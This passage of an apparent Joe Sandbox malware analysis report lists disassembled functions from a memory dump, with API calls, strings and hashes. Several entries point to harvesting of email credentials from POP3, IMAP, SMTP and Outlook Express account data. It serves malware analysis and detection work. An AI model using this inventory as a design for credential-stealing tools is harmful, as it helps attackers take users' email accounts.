                                                                                              • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                              • String ID:
                                                                                              • API String ID: 1999381814-0
                                                                                              • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                              • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                              • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                              • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpymemset
                                                                                              • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                              • API String ID: 1297977491-3883738016
                                                                                              • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                              • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                              • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                              • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                • Part of subcall function 00449550: memcpy.MSVCRT ref: 004495C8
                                                                                                • Part of subcall function 00449550: memcpy.MSVCRT ref: 00449616
                                                                                              • memcpy.MSVCRT ref: 0044972E
                                                                                              • memcpy.MSVCRT ref: 0044977B
                                                                                              • memcpy.MSVCRT ref: 004497F6
                                                                                                • Part of subcall function 00449260: memcpy.MSVCRT ref: 00449291
                                                                                                • Part of subcall function 00449260: memcpy.MSVCRT ref: 004492DD
                                                                                              • memcpy.MSVCRT ref: 00449846
                                                                                              • memcpy.MSVCRT ref: 00449887
                                                                                              • memcpy.MSVCRT ref: 004498B8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memset
                                                                                              • String ID: gj
                                                                                              • API String ID: 438689982-4203073231
                                                                                              • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                              • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                              • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                              • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: __aulldvrm$__aullrem
                                                                                              • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                              • API String ID: 643879872-978417875
                                                                                              • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                              • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                              • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                              • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405810 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                              • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                              • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                              • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                              • memset.MSVCRT ref: 004058C3
                                                                                              • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                              • SetFocus.USER32(?), ref: 00405976
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$FocusItemmemset
                                                                                              • String ID:
                                                                                              • API String ID: 4281309102-0
                                                                                              • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                              • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                              • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                              • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040A83A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                              • _mbscat.MSVCRT ref: 0040A8FF
                                                                                              • sprintf.MSVCRT ref: 0040A921
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite_mbscatsprintfstrlen
                                                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                              • API String ID: 1631269929-4153097237
                                                                                              • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                              • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                              • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                              • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040810E
                                                                                                • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,00000000,75A8EB20,?), ref: 004081B9
                                                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                              • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                              • API String ID: 524865279-2190619648
                                                                                              • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                              • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                              • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                              • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                              • String ID: 0$6
                                                                                              • API String ID: 2300387033-3849865405
                                                                                              • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                              • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                              • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                              • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004076B7 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpystrlen$memsetsprintf
                                                                                              • String ID: %s (%s)
                                                                                              • API String ID: 3756086014-1363028141
                                                                                              • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                              • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                              • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                              • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscat$memsetsprintf
                                                                                              • String ID: %2.2X
                                                                                              • API String ID: 125969286-791839006
                                                                                              • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                              • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                              • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                              • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                                                                              • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                                                                                                • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                                                                                              • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                              • String ID: ACD
                                                                                              • API String ID: 1886237854-620537770
                                                                                              • Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                                                                              • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                              • Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                                                                              • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004091EC
                                                                                              • sprintf.MSVCRT ref: 00409201
                                                                                                • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                                                                                              • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                              • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                              • String ID: caption$dialog_%d
                                                                                              • API String ID: 2923679083-4161923789
                                                                                              • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                              • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                              • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                              • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00426918 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                              • unknown error, xrefs: 004277B2
                                                                                              • abort due to ROLLBACK, xrefs: 00428781
                                                                                              • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                              • no such savepoint: %s, xrefs: 00426A02
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                              • API String ID: 3510742995-3035234601
                                                                                              • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                              • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                                              • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                              • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0042B927 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset
                                                                                              • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                              • API String ID: 2221118986-3608744896
                                                                                              • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                              • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                              • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                              • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                              • memset.MSVCRT ref: 00410246
                                                                                              • memset.MSVCRT ref: 00410258
                                                                                                • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                                                                                              • memset.MSVCRT ref: 0041033F
                                                                                              • _mbscpy.MSVCRT ref: 00410364
                                                                                              • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                              • String ID:
                                                                                              • API String ID: 3974772901-0
                                                                                              • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                              • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                              • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                              • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • wcslen.MSVCRT ref: 0044406C
                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                                                              • strlen.MSVCRT ref: 004440D1
                                                                                                • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                                                                                                • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                                                              • memcpy.MSVCRT ref: 004440EB
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                              • String ID:
                                                                                              • API String ID: 577244452-0
                                                                                              • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                                                              • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                              • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                                                              • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                                                              • _strcmpi.MSVCRT ref: 00404518
                                                                                              • _strcmpi.MSVCRT ref: 00404536
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strcmpi$memcpystrlen
                                                                                              • String ID: imap$pop3$smtp
                                                                                              • API String ID: 2025310588-821077329
                                                                                              • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                              • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                              • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                              • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040C02D
                                                                                                • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                                                                                • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                                                                                • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                                                                                                • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                                                                                                • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                              • API String ID: 2726666094-3614832568
                                                                                              • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                              • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                              • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                              • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040C143 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                              • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                              • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                              • GetLastError.KERNEL32 ref: 0040C1CA
